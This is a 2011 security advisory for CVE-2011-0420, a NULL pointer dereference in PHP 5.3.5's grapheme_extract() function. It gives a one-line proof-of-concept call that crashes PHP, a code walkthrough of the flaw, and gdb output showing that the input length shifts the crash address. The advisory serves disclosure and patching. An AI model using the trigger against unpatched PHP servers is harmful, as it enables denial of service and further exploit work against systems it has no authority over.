1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152 | Source: http://securityreason.com/securityalert/8087
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 09.12.2010
- - Pub.: 17.02.2011
CVE: CVE-2011-0420
CERT: VU#210829
Affected Software:
- - PHP 5.3.5
Fixed: SVN
Original URL:
http://securityreason.com/achievement_securityalert/94
- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a wrapper
for ICU library, enabling PHP programmers to perform UCA-conformant
collation and date/time/number/currency formatting in their scripts.
grapheme_extract — Function to extract a sequence of default grapheme
clusters from a text buffer, which must be encoded in UTF-8.
- --- 1. PoC for grapheme_extract() ---
grapheme_extract('a',-1);
Change length of first parameter to change rip.
- --- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)
- -grapheme_extract()--
...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char
**)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {
<=== str='a' and size='-1'
...
/* if the string is all ASCII up to size+1 - or str_len whichever is first
- then we are done.
(size + 1 because the size-th character might be the beginning of a
grapheme cluster)
*/
if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 :
str_len ) ) { <=== ( size=-1+1=0 ) ===
long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1
if ( NULL != next ) {
ZVAL_LONG(next, start+nsize);
}
RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT
}
...
- -grapheme_extract()--
if we call to grapheme_ascii_check(pstr,0) where
- -grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len) <====
len=0
{
int ret_len = len;
while ( len-- ) {
if ( *day++ > 0x7f )
return -1;
}
return ret_len; <=== return 0
}
- -grapheme_ascii_check()--
then we get (int)0 in result and
long nsize = ( size < str_len ? size : str_len );
will be -1. Therefore,
RETURN_STRINGL(((char *)pstr), nsize, 1);
give NULL pointer dereference here.
Changing length of first parameter of grapheme_extract(), we will also
change rip in memcpy(3).
(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000: Cannot access memory at address 0x11b2000
(gdb) r -r
'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
,-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10
(gdb) x/x $rsi
0x11b1fe8: 0x00000000
- --- 3. Fix ---
CVS
http://svn.php.net/viewvc?view=revision&revision=306449
- --- 4. Greets ---
Pierre, Stas, sp3x, infospec
- --- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]
Email:
- - cxib {a\./t]securityreason[d=t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iQIcBAEBAgAGBQJNXFUmAAoJEIO8+dzW5bUwCvgP/RJCNbPYGy0L366IAyjS4JTf
SJ3yt0Vur/v0lPW25+avn1cM/h9eV4o1I41GUvtHB4B4QZKTMx1IXzltCKLVixF8
9Go6ACO8XgtYGpMHRE6ODzHTRLvpdKlIITeviEuCCgRaDOfY2Aov1Kv3V2r24csu
mwi6zz0zRwx+34rSNy9AYj7bhHY3OwdFoJ43RIMVNEhastSmfIR9D0a60OAKVBsA
138tDvkNVsJGUFx06sig2uMuZ6F948pr8L7Y7R+HIoMTAg+udkGdfBa4FLkVJIE8
g5kFjJzTE43k3X+Dh7GEf6xEEkNCME3XoSLEDmD/G/+TC6GgmGBokhXExqc0aIJo
c7ufy4khYkYKuLhQBnSeGknq9l8X1l9PIJSYr0qeY/Dga4NIDhccJuTnmE0xAYGY
bmizSRGKKz9e05JDGcKy51mS2zP/fU6NsjgkuIezkBsuQL/6U2k9FYWfymgi+zwy
isRqtmE67pF7xmUybE4nTd4FOZbo7Kkx4g32C7xGyPdnCufnahD+9NXaaDv2HhTk
vE5d2EZr1jJyszkY/x2ZUdnMNLp4Ahwj/RpnLlV+//97cuDmjqTLd8Yhu2q2D7k/
wsgrej0XFPGTIEfXNxWIgaD2g/9C9MPPFOt8M9xu+v7jJC0be72QPxnThbSdEyAh
0m12NQTJ+ko52o1g25Z/
=PBFA
-----END PGP SIGNATURE-----
|